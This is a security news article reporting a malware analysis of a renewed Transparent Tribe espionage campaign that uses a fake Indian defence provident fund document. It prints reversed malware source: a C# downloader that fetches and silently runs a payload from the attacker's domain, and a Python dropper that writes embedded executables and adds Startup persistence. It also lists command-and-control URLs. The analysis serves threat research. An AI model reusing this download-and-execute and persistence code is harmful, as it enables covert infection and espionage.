Pierluigi Paganini February 21, 2020

Exclusive: Pakistan and India to armaments. Researchers from Cybaze-Yoroi ZLab gathered intelligence on the return of Operation Transparent Tribe is back 4 years later

Introduction

The Operation Transparent Tribe was first spotted by Proofpoint Researchers in Feb 2016, in a series of espionages operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrate information, take screenshot and record webcam streams.

This threat actor has vanished for a long period, and only the last month appeared another time probably for the actual tensions between two countries. We noticed that the TTP of the group is almost the same leveraging a weaponized document with a fake certificate of request of an Indian public fund. So, Cybaze-Yoroi ZLab team decided to dive deep into technical analysis.

Technical Analysis

Table 1. Static information about the malicious macro 

The document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund). It is a fund where an officer compulsorily deposits some money to Govt on a monthly basis out of his wages / salary. 

The Fund is financial planning for defense personnel. The money is kept by the government and in return, a “non-permanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been set up as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise.

Figure 1: Piece of the malicious document employed in the Op. Transparent Tribe

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection:

Figure 2: Piece of the malicious macro

The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection.

Then it is possible to deobfuscate them.

Figure 3: Extracted component from the macro

The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. 

Figure 4: Extracted files

Analyzing these files, we have a vbs script, a C# script and a zip file, inside this archive we found 4 PE artifacts:

Figure 5: Content of the “systemidleperf.zip” file

The SilentCMD Module

The two dll are legit windows library and are used in support of the malicious behaviour. Instead, the “windproc.scr” and “windprocx.scr” files are the compiled version of the utility SilentCMD publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file.

Figure 6: SilentCMD main routine

The SilentCMD utility is used to execute the commands pushed from the C2, and all of them will be executed without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, with the only difference in timestamp:

Figure 7: Comparison between the two files

The Real Time Module

The other extracted file is the “Realtime.cs” file, which is the source of a piece of code written in C#, and it is compiled and run during the execution of the macro. The code is very simple and it has the only purpose to download another component from the internet: 

1. using System;
2. using System.Collections.Generic;
3. using System.Diagnostics;
4. using System.IO;
5. using System.Net;
6. using System.Text;
8. namespace Realtime
9. {
10. class Program
11. {
12. static void Main(string[] args)
13. {
15. WebClient wc = new WebClient();
16. wc.DownloadFile(“http://www.awsyscloud.com/x64i.scr”, @”c:\\programdata\\systemidleperf\\x64i.scr”);
17. Process proc = new Process();
18. proc.StartInfo.FileName = Convert.ToString(args[0]);
19. proc.StartInfo.Arguments = “/c ” + Convert.ToString(args[1]);
20. proc.StartInfo.UseShellExecute = false;
21. proc.StartInfo.CreateNoWindow = false;
22. proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
23. proc.Start();
25. Environment.Exit(0);
26. //Application.Exit();
27. /* if (!proc.Start())
28. {
29. //Console.WriteLine(“Error starting”);
30. return;
31. }*/
32. //proc.WaitForExit();
33. }
34. }
35. }

Code snippet 1

The code is really simple, it has the function of downloading the file “x64i.scr” from the dropurl “awsysclou[.com” and then saves it into the folder “c:\programdata\systemidleperf\”. The file is immediately executed through the C# primitives.

The X64i.scr File

Table 2. Static information about the Pyhton Stub

The icon of the executable let us understand that the malware has been forged through the usage of the tool Pyinstaller. It is a tool that permits a user to create a complete self-contained executable starting from a python source code. However, the two main disadvantages of choosing this solution are the high footprint of the executable (reaching more than 7.5MB and this generates a lot of noise inside the system); and the easiness to reverse the executable to obtain the source code.

So, after the operation of reversing, the extracted code of the malware is the following:

1. from ctypes import *
2. import socket, time, os, struct, sys
3. from ctypes.wintypes import HANDLE, DWORD
4. import platform
5. import ctypes
6. import _winreg
7. import time
8. import os
9. import platform
11. import binascii
12. import _winreg
13. import subprocess
14. bitstream3 = “PAYLOAD_ONE”
15. bitstream4 = “PAYLOAD_TWO”
17. oses = os.name
18. systems = platform.system()
19. releases = platform.release()
20. architectures = platform.architecture()[0]
22. def main():
23. try:
24. runsameagain()
25. except Exception as e:
26. print str(e)
28. def runsameagain():
29. global bitstream3
30. binstr = bytearray(binascii.unhexlify(bitstream3))
31. if not os.path.exists(“c:\programdata\SppExtComTel”):
32. os.makedirs(“c:\programdata\SppExtComTel”)
33. WriteFile(“c:\programdata\SppExtComTel\SppExtComTel.scr”,binstr);
34. bootup()
35. subprocess.Popen([“c:\programdata\SppExtComTel\SppExtComTel.scr”, ‘–brilliance’])
37. def rundifferentagain():
38. global bitstream4
39. binstr = bytearray(binascii.unhexlify(bitstream4))
40. if not os.path.exists(“c:\programdata\SppExtComTel”):
41. os.makedirs(“c:\programdata\SppExtComTel”)
42. WriteFile(“c:\programdata\SppExtComTel\SppExtComTel.scr”,binstr);
43. bootup()
44. subprocess.Popen([“c:\programdata\SppExtComTel\SppExtComTel.scr”, ‘–brilliance’])
46. def Streamers():
47. try:
48. rundifferentagain()
49. return 1
50. except Exception as e:
51. print str(e)
53. def WriteFile(filename,data):
54. with open(filename,”wb”) as output:
55. output.write(data)
58. def bootup():
59. try:
60. from win32com.client import Dispatch
61. from win32com.shell import shell,shellcon
62. dpath = “c:\programdata\SppExtComTel”
63. #print “before”
64. Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
65. com_path = os.path.join(Start_path, “SppExtComTel.lnk”)
66. target = os.path.join(dpath,”SppExtComTel.scr”)
67. wDir = dpath
68. icon = os.path.join(dpath, “SppExtComTel.scr”)
69. shell = Dispatch(‘WScript.Shell’)
70. shortcut = shell.CreateShortCut(com_path)
71. shortcut.Targetpath = target
72. shortcut.WorkingDirectory = wDir
73. shortcut.IconLocation = icon
74. shortcut.save()
75. #print “there”
76. #return True
77. except Exception, e:
78. print str(e)
81. if __name__ == “__main__”:
82. try:
83. #print oses
84. #print systems
85. #print releases
86. #print architectures
87. if ‘.py’ not in sys.argv[0]:
88. #sys.exit()
89. #print “nothign to do”
90. if systems == ‘Windows’ and releases == “7”:
91. main()
92. elif systems == ‘Windows’ and (releases == “8.1” or releases == “8”):
93. Streamers()
94. elif systems == ‘Windows’ and releases == “10”:
95. #print “Please use a 64 bit version of python”
96. #print “entering streamers”
97. Streamers()
98. else:
99. Streamers()
100. except Exception as e:
101. print str(e)

Code snippet 2 

The python code is very simple to analyze and to explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”. They are the hexadecimal representation of two PE files, that will be deepened in the next sections. These two files are chosen according to the Windows OS version, as visible at the bottom of the code.

After that, the script writes the desired payload into the folder “c:\programdata\SppExtComTel\” and immediately executed it with the parameter “–brilliance”. After that, the malware guarantees its persistence through the  creation of a LNK file inside the Startup folder.

Figure 8: Persistence mechanism

The RAT

As previously stated, the malware payload is the core component of the malware implant. 

As shown in the above figure, the malware is written in .NET framework and the creation date back to 29 Jan 2020. It is the date of the beginning of the malware campaign, also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

Figure 10: C2 communication

The method used to send the information to the C2 is the following: 

Figure 11: C2 communication routine

After that, the malware loops in a cycle and waits for some commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

• http[://awsyscloud[.com/E@t!aBbU0le8hiInks/B/3500/m1ssh0upUuchCukXanevPozlu[.dll
• http[://awsyscloud[.com/E@t!aBbU0le8hiInks/D/3500/p2ehtHero0paSth3end.dll

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests for an RSA key, which has to be validated by the highlighted text. If the check is positive, the malware can go on to its malicious actions, such as sending of information: 

Figure 14: Sending routine of the malware

The second malware module is a simple DLL having the purpose to download other components from the dropURL and then install it:

Figure 15: Evidence of the hard-coded AES key

The downloaded code has been encrypted through the Rijndael algorithm with a hard-coded key.

Conclusion

The Transparent tribe is back with a new campaign after several years of (apparently) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for a DSOP FUND  (Defence Services Officers Provident Fund) a providence fund for official and military personnel, confirming the espionage and counterintelligence character of this campaign. 

At last, we have no certainty that this campaign has been inactive for 4 years, it may be that it acted quietly, but, now the cyber criminal group is back in view of today’s tensions between the two countries.

Additional technical details, including Indicators of Compromise and Yara Rules, are reported in the analysis published by ZLab available here:

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Transparent Tribe)

[adrotate banner=”5″]

[adrotate banner=”13″]